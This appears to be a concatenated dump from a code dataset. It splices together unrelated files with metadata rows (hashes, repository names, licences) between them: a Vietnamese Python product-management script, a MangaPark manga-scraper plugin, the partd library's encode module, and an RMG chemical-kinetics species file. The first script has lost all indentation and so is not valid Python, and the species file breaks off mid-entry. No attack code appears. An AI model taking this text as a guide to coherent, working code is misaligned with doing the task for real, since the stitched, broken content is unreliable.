print("*** XรA SแบขN PHแบจM ***")
print("Nhแบญp ID sแบฃn phแบฉm cแบงn xรณa:")
Id = int(input())
product = FindProductDuplicate(Id)
if product == False:
print("Khรดng tรฌm thแบฅy sแบฃn phแบฉm ID = ".upper(), Id)
print("********************************")
else:
answer = input("Bแบกn cรณ muแปn xรณa sแบฃn phแบฉm nร y khรดng? Y/N ".upper())
if answer == "y" or answer == "Y":
if product != False:
list_product.list_product.remove(product[1])
print("Xรณa sแบฃn phแบฉm thร nh cรดng!".upper())
print("********************************")
else:
print("ฤรฃ tแปซ chแปi xรณa sแบฃn phแบฉm nร y!".upper())
print("********************************")
# Tรฌm kiแบฟm sแบฃn phแบฉm
def FindProductByName():
print("*** TรM KIแบพM SแบขN PHแบจM ***")
if (len(list_product.list_product) == 0 or len(list_product.list_product) < 0):
print("Chฦฐa cรณ sแบฃn phแบฉm nร o trong giแป!".upper())
print("********************************")
else:
NameProduct = str(
input("Nhแบญp tรชn sแบฃn phแบฉm hoแบทc tรชn thฦฐฦกng hiแปu bแบกn muแปn tรฌm kiแบฟm: ")).upper()
is_found = False
for i in range(0, len(list_product.list_product)):
if str(list_product.list_product[i]['Product_name']).upper() in NameProduct or str(list_product.list_product[i]['Brand']).upper() in NameProduct:
is_found = True
print("ID : \t", list_product.list_product[i]['Id']),
print("Mรฃ sแบฃn phแบฉm : \t",
list_product.list_product[i]['Product_code']),
print("Tรชn sแบฃn phแบฉm : \t",
list_product.list_product[i]['Product_name']),
print("Thฦฐฦกng hiแปu : \t", list_product.list_product[i]['Brand']),
print("Giรก : \t", list_product.list_product[i]['Price']),
print("Nฤm xuแบฅt bแบฃn : \t", list_product.list_product[i]['Year']),
print("Sแป lฦฐแปฃng : \t", list_product.list_product[i]['Quantity']),
print("Size giร y : \t", list_product.list_product[i]['Size'])
print("Tรฌnh trแบกng : \t", list_product.list_product[i]['Status'])
print("________________________________")
if not is_found:
print("Khรดng tรฌm thแบฅy sแบฃn phแบฉm nร y @@".upper())
print("********************************")
def SortProductNameA_Z():
list_product.list_product.sort(key=lambda item: item.get("Product_name"))
def SortProductNameZ_A():
list_product.list_product.sort(
key=lambda item: item.get("Product_name"), reverse=True)
def SortPriceAsc():
list_product.list_product.sort(key=lambda item: item.get("Price"))
def SortPriceDesc():
list_product.list_product.sort(
key=lambda item: item.get("Price"), reverse=True)
| [
"[email protected]"
] | |
09402cd9cb8b46c4bea215f5fb80144e37a7266b | 045025f41201dba54c005dd0601d97ccdedf3062 | /ScrapePlugins/MangaPark/FeedLoader.py | fd8b09f1220b87bdd841d7a1030882891c7728a3 | [] | no_license | Gazzilow/MangaCMS | 6720c45c63c0429cc0e0a37d99738bfb553ca98b | e620bfef62c9b3d4678b635a2ea6463ffb26fc34 | refs/heads/master | 2021-01-22T09:40:17.277953 | 2015-12-19T21:33:25 | 2015-12-19T21:33:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,396 | py |
import webFunctions
import bs4
import re
import urllib.parse
import time
import calendar
import dateutil.parser
import runStatus
import settings
import datetime
import ScrapePlugins.RetreivalDbBase
class FeedLoader(ScrapePlugins.RetreivalDbBase.ScraperDbBase):
loggerPath = "Main.Manga.Mp.Fl"
pluginName = "MangaPark Link Retreiver"
tableKey = "mp"
dbName = settings.dbName
wg = webFunctions.WebGetRobust(logPath=loggerPath+".Web")
tableName = "MangaItems"
urlBase = "http://mangapark.com/"
feedUrl = "http://mangapark.com/latest"
def closeDB(self):
self.log.info( "Closing DB...",)
self.conn.close()
self.log.info( "done")
def checkMatureAgree(self, page, url):
if "This series contains mature contents" in page:
self.log.info("Need to step through mature agreement page.")
page = self.wg.getpage(url, postData={"adult" : "true"})
return page
def getItemPages(self, info):
url, series = info
# print("Should get item for ", url)
page = self.wg.getpage(url)
page = self.checkMatureAgree(page, url)
soup = bs4.BeautifulSoup(page)
series = soup.find("h1", class_="title")
container = soup.find("div", class_="list")
seriesName = series.get_text().strip()
segmentDivs = container.find_all("div", class_="group", recursive=False)
ret = []
for segment in segmentDivs:
chaps = segment.find_all("div", class_="element")
for chap in chaps:
dlLink = chap.find("div", class_="icon_wrapper").a["href"]
dlTitle = chap.find("div", class_="title").get_text()
dlTitle = dlTitle.replace(":", " -") # Can't have colons in filenames
# print("dlLink", dlLink, dlTitle)
item = {}
chapDate = chap.find("div", class_="meta_r")
datestr = list(chapDate)[-1]
datestr = datestr.strip(", ")
date = dateutil.parser.parse(datestr, fuzzy=True)
item["originName"] = "{series} - {file}".format(series=seriesName, file=dlTitle)
item["sourceUrl"] = dlLink
item["seriesName"] = seriesName
item["retreivalTime"] = calendar.timegm(date.timetuple())
# print("Item", item)
ret.append(item)
return ret
def getSeriesUrls(self):
ret = []
soup = self.wg.getSoup(self.feedUrl)
content = soup.find('div', class_='ls1')
divs = content.find_all("div", class_="item")
for div in divs:
# First a in the div is the title image
url = div.a["href"]
url = urllib.parse.urljoin(self.urlBase, url)
text = div.a['title']
ret.append((url, text))
return ret
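# For illustration (shape inferred from the __main__ block below): each returned
# entry is a (url, title) tuple such as
# ('http://mangapark.com/manga/zai-x-10-yamauchi-yasunobu', 'Zai x 10').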
def getAllItems(self):
# for item in items:
# self.log.info( item)
#
self.log.info( "Loading Mc Items")
ret = []
seriesPages = self.getSeriesUrls()
for item in seriesPages:
itemList = self.getItemPages(item)
for item in itemList:
ret.append(item)
if not runStatus.run:
self.log.info( "Breaking due to exit flag being set")
break
self.log.info("Found %s total items", len(ret))
return ret
def go(self):
self.resetStuckItems()
self.log.info("Getting feed items")
feedItems = self.getAllItems()
self.log.info("Processing feed Items")
self.processLinksIntoDB(feedItems)
self.log.info("Complete")
if __name__ == "__main__":
import utilities.testBase as tb
with tb.testSetup(startObservers=False):
mon = FeedLoader()
# mon.getSeriesUrls()
mon.getItemPages(('http://mangapark.com/manga/zai-x-10-yamauchi-yasunobu', 'Zai x 10'))
# mon.go()
| [
"[email protected]"
] | |
6605bcf24b243c6cbe8ac5a6bd439b0d5204fe19 | dd05adda58c40b3a6593d89c53be1ce64df2be0a | /partd/encode.py | 3e3a15f7966f18e7ac388517e92437fc832a5ecd | [] | permissive | dask/partd | 4fb98971d4f9b891ca944584517be3157e06de81 | 4183caf149b686538752608bac6acbaa052dba23 | refs/heads/main | 2023-07-20T04:38:51.234966 | 2023-07-17T21:12:35 | 2023-07-17T21:12:35 | 35,185,364 | 94 | 35 | BSD-3-Clause | 2023-07-17T21:12:37 | 2015-05-06T22:08:45 | Python | UTF-8 | Python | false | false | 1,287 | py | from .core import Interface
from .file import File
from toolz import valmap
from .utils import frame, framesplit
class Encode(Interface):
def __init__(self, encode, decode, join, partd=None):
if not partd or isinstance(partd, str):
partd = File(partd)
self.partd = partd
self.encode = encode
self.decode = decode
self.join = join
Interface.__init__(self)
def __getstate__(self):
return self.__dict__
__setstate__ = Interface.__setstate__
def append(self, data, **kwargs):
data = valmap(self.encode, data)
data = valmap(frame, data)
self.partd.append(data, **kwargs)
def _get(self, keys, **kwargs):
raw = self.partd._get(keys, **kwargs)
return [self.join([self.decode(frame) for frame in framesplit(chunk)])
for chunk in raw]
def delete(self, keys, **kwargs):
return self.partd.delete(keys, **kwargs)
def _iset(self, key, value, **kwargs):
return self.partd.iset(key, frame(self.encode(value)), **kwargs)
def drop(self):
return self.partd.drop()
@property
def lock(self):
return self.partd.lock
def __exit__(self, *args):
self.drop()
self.partd.__exit__(*args)
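# Minimal usage sketch (illustrative, not part of the original module; assumes
# pickle-style encode/decode callables and a list-concatenating join):
#
#   import pickle
#   p = Encode(pickle.dumps, pickle.loads, join=lambda parts: sum(parts, []))
#   p.append({'x': [1, 2, 3]})
#   p.append({'x': [4, 5]})
#   p.get('x')   # -> [1, 2, 3, 4, 5]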
| [
"[email protected]"
] | |
6612c6f4c3bdadebf80c104974b4eb724807ed7d | 41fd80f9ccc72a17c2db16b7019312a87d3181e8 | /zhang_local/pdep/network2841_1.py | 7b1d642fe6767e4eb58b8f5522f08e99ec0b79c4 | [] | no_license | aberdeendinius/n-heptane | 1510e6704d87283043357aec36317fdb4a2a0c34 | 1806622607f74495477ef3fd772908d94cff04d9 | refs/heads/master | 2020-05-26T02:06:49.084015 | 2019-07-01T15:12:44 | 2019-07-01T15:12:44 | 188,069,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47,701 | py | species(
label = '[CH]=CC([CH2])([CH2])[O](9680)',
structure = SMILES('[CH]=CC([CH2])([CH2])[O]'),
E0 = (664.937,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,3010,987.5,1337.5,450,1655,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,212.485,212.488,212.49,212.49,1273.28,1273.28],'cm^-1')),
HinderedRotor(inertia=(0.507989,'amu*angstrom^2'), symmetry=1, barrier=(16.2759,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00234803,'amu*angstrom^2'), symmetry=1, barrier=(16.2961,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.49098,'amu*angstrom^2'), symmetry=1, barrier=(47.7709,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.39957,0.0593922,-6.51795e-05,3.99484e-08,-1.00652e-11,80065.3,25.89], Tmin=(100,'K'), Tmax=(954.892,'K')), NASAPolynomial(coeffs=[9.64884,0.0248357,-1.0895e-05,2.04843e-09,-1.42428e-13,78489.8,-13.527], Tmin=(954.892,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(664.937,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ) + radical(Cds_P) + radical(C=CC(C)(O)CJ)"""),
)
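# Note (added for clarity, not part of the generated network): each NASAPolynomial
# above stores the standard 7-coefficient NASA form, in which
#   Cp(T)/R = a1 + a2*T + a3*T**2 + a4*T**3 + a5*T**4
# over the stated Tmin..Tmax window, with a6 and a7 fixing the enthalpy (H/RT)
# and entropy (S/R) offsets.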
species(
label = 'C#C(582)',
structure = SMILES('C#C'),
E0 = (214.792,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([750,770,3400,2100,559.488,618.58,3890.62],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (26.0373,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(1737.73,'J/mol'), sigma=(4.1,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.03575,0.00771239,2.53493e-06,-1.08133e-08,5.50757e-12,25852.6,4.54461], Tmin=(100,'K'), Tmax=(888.627,'K')), NASAPolynomial(coeffs=[5.76205,0.00237159,-1.49583e-07,-2.19155e-11,2.21779e-15,25094.5,-9.82608], Tmin=(888.627,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(214.792,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(87.302,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Ct-CtH) + group(Ct-CtH)"""),
)
species(
label = '[CH2]C(=C)[O](4273)',
structure = SMILES('[CH2]C(=C)[O]'),
E0 = (88.2866,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,350,440,435,1725,3000,3100,440,815,1455,1000,510.595],'cm^-1')),
HinderedRotor(inertia=(0.0480287,'amu*angstrom^2'), symmetry=1, barrier=(8.88265,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (56.0633,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3365.98,'J/mol'), sigma=(5.64088,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=525.76 K, Pc=42.55 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.6374,0.0235792,5.32605e-07,-2.30624e-08,1.26355e-11,10673.5,14.3058], Tmin=(100,'K'), Tmax=(894.06,'K')), NASAPolynomial(coeffs=[10.3562,0.00670937,-7.99446e-07,2.86693e-11,-3.46262e-16,8587.33,-26.0166], Tmin=(894.06,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(88.2866,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(178.761,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsHH) + radical(C=C(C)OJ) + radical(C=C(O)CJ)"""),
)
species(
label = 'H(8)',
structure = SMILES('[H]'),
E0 = (211.805,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25474.2,-0.444973], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25474.2,-0.444973], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.805,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'C#CC([CH2])([CH2])[O](10603)',
structure = SMILES('C#CC([CH2])([CH2])[O]'),
E0 = (580.75,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([750,770,3400,2100,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,2175,525,342.505,342.506,342.508,342.51,342.511,342.511],'cm^-1')),
HinderedRotor(inertia=(1.06573,'amu*angstrom^2'), symmetry=1, barrier=(88.7293,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.06581,'amu*angstrom^2'), symmetry=1, barrier=(88.7291,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.162808,'amu*angstrom^2'), symmetry=1, barrier=(13.5539,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.851998,0.0708558,-9.20572e-05,5.64386e-08,-1.15125e-11,69960.1,21.8491], Tmin=(100,'K'), Tmax=(759.885,'K')), NASAPolynomial(coeffs=[13.8222,0.0146178,-4.80407e-06,7.34239e-10,-4.38786e-14,67641.5,-39.4496], Tmin=(759.885,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(580.75,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Ct-CtCs) + group(Ct-CtH) + radical(CC(C)2OJ) + radical(CJC(C)2O) + radical(CJC(C)2O)"""),
)
species(
label = 'CH2(T)(28)',
structure = SMILES('[CH2]'),
E0 = (381.37,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1066.91,2790.99,3622.37],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.01192,-0.000154979,3.26298e-06,-2.40422e-09,5.69497e-13,45867.7,0.5332], Tmin=(100,'K'), Tmax=(1104.58,'K')), NASAPolynomial(coeffs=[3.14983,0.00296674,-9.76056e-07,1.54115e-10,-9.50338e-15,46058.1,4.77808], Tmin=(1104.58,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(381.37,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(T)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]=CC(=C)[O](5179)',
structure = SMILES('[CH]=CC(=C)[O]'),
E0 = (264.929,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2950,3100,1380,975,1025,1650,350,440,435,1725,3010,987.5,1337.5,450,1655,180],'cm^-1')),
HinderedRotor(inertia=(0.979636,'amu*angstrom^2'), symmetry=1, barrier=(22.5238,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (68.074,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3512.15,'J/mol'), sigma=(5.74623,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=548.59 K, Pc=42 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.41648,0.0452197,-4.57103e-05,2.25525e-08,-4.15485e-12,31966.6,18.4199], Tmin=(100,'K'), Tmax=(1540.92,'K')), NASAPolynomial(coeffs=[13.6856,0.00610864,-5.68369e-07,-3.63413e-11,6.19928e-15,29047.6,-43.2788], Tmin=(1540.92,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(264.929,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(203.705,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cds-Cds(Cds-Cds)O2s) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(C=C(C)OJ)"""),
)
species(
label = 'O(T)(63)',
structure = SMILES('[O]'),
E0 = (243.034,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29230.2,4.09104], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29230.2,4.09104], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.034,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O(T)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]=CC([CH2])=C(6418)',
structure = SMILES('[CH]=CC([CH2])=C'),
E0 = (454.926,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2950,3100,1380,975,1025,1650,350,440,435,1725,3120,650,792.5,1650,3010,987.5,1337.5,450,1655],'cm^-1')),
HinderedRotor(inertia=(1.24264,'amu*angstrom^2'), symmetry=1, barrier=(28.5706,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.24122,'amu*angstrom^2'), symmetry=1, barrier=(28.5382,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78106,0.037761,-5.50502e-07,-3.25865e-08,1.70814e-11,54805,16.5508], Tmin=(100,'K'), Tmax=(940.402,'K')), NASAPolynomial(coeffs=[14.417,0.0116883,-3.10524e-06,5.17928e-10,-3.8287e-14,51204.7,-50.1403], Tmin=(940.402,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(454.926,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(249.434,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Allyl_P)"""),
)
species(
label = '[CH]=[CH](583)',
structure = SMILES('[CH]=[CH]'),
E0 = (536.342,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([637.691,1081.65,1081.98,1082.08,3058.36,3477.84],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (26.0373,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.83395,-0.000554326,2.20867e-05,-2.90276e-08,1.14365e-11,64516.9,6.06922], Tmin=(100,'K'), Tmax=(916.167,'K')), NASAPolynomial(coeffs=[5.69903,0.00213261,-4.3877e-08,-2.1344e-11,5.56752e-16,63720.6,-5.24595], Tmin=(916.167,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(536.342,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_P)"""),
)
species(
label = '[CH2][C]([CH2])[O](10271)',
structure = SMILES('[CH2][C]([CH2])[O]'),
E0 = (537.173,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([360,370,350,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,278.503],'cm^-1')),
HinderedRotor(inertia=(0.00215299,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0939305,'amu*angstrom^2'), symmetry=1, barrier=(5.13965,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (56.0633,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.0694,0.0447257,-6.5608e-05,5.12452e-08,-1.57124e-11,64674.3,16.4544], Tmin=(100,'K'), Tmax=(870.707,'K')), NASAPolynomial(coeffs=[8.27065,0.0130302,-5.47972e-06,9.76923e-10,-6.45299e-14,63716,-11.9064], Tmin=(870.707,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(537.173,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(174.604,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(C2CsJOH) + radical(CJCO) + radical(CC(C)OJ) + radical(CJCO)"""),
)
species(
label = '[CH2]C([CH2])([O])[C]=C(10604)',
structure = SMILES('[CH2]C([CH2])([O])[C]=C'),
E0 = (655.683,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.3887,0.0610877,-7.5548e-05,5.49349e-08,-1.65708e-11,78951.1,25.9991], Tmin=(100,'K'), Tmax=(801.647,'K')), NASAPolynomial(coeffs=[8.16619,0.02727,-1.22704e-05,2.31222e-09,-1.60016e-13,77864.5,-5.20003], Tmin=(801.647,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(655.683,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)(O)CJ) + radical(Cds_S) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH]=[C]C([CH2])([CH2])O(10605)',
structure = SMILES('[CH]=[C]C([CH2])([CH2])O'),
E0 = (673.676,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,1685,370,3615,1277.5,1000,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.938906,0.0707141,-9.39482e-05,6.32477e-08,-1.56302e-11,81131.8,26.8095], Tmin=(100,'K'), Tmax=(732.008,'K')), NASAPolynomial(coeffs=[11.7978,0.020118,-8.18144e-06,1.45039e-09,-9.63171e-14,79307.8,-23.7905], Tmin=(732.008,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(673.676,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(266.063,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)(O)CJ) + radical(Cds_P)"""),
)
species(
label = '[CH]=[C]C([CH2])(C)[O](10606)',
structure = SMILES('[CH]=[C]C([CH2])(C)[O]'),
E0 = (689.335,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,1685,370,180,180,180,495.024,495.028,3719.26],'cm^-1')),
HinderedRotor(inertia=(0.278085,'amu*angstrom^2'), symmetry=1, barrier=(15.0854,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.14184,'amu*angstrom^2'), symmetry=1, barrier=(49.2451,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0135912,'amu*angstrom^2'), symmetry=1, barrier=(2.36333,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
